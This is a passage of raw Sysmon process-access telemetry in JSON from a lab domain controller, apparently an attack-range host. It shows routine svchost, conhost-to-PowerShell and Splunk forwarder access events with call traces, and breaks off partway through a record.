{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4835,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.364\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.364","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4836,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.364\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.364","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4837,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.364\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.364","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4838,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.364\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.364","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4839,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.364\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.364","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4840,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.364\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.364","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4841,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.364\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.364","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4842,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.364\r\nSourceProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010A36F0600}\r\nSourceProcessId: 1492\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C1-5F25-0000-001069990600}\r\nTargetProcessId: 3216\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.364","SourceProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010A36F0600}","SourceProcessId":"1492","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11C1-5F25-0000-001069990600}","TargetProcessId":"3216","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4843,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.380\r\nSourceProcessGUID: {E2A3D6B1-11C1-5F25-0000-0010AC970600}\r\nSourceProcessId: 3220\r\nSourceThreadId: 1004\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program 